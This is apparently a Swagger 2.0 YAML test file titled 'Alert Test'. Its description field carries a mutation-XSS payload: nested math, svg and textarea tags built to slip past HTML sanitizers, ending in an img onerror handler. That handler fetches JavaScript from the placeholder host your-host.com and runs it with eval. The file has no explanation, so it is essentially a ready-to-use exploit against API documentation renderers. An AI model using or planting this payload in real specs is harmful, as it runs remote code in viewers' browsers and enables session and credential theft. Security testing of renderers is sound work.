swagger: '2.0'
info:
  title: Alert Test
  description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://your-host.com/alert.js`).then(res=>res.text()).then(eval)>'></textarea></mtext></svg></mglyph></mtext></math>
  version: 1.0
paths: {}
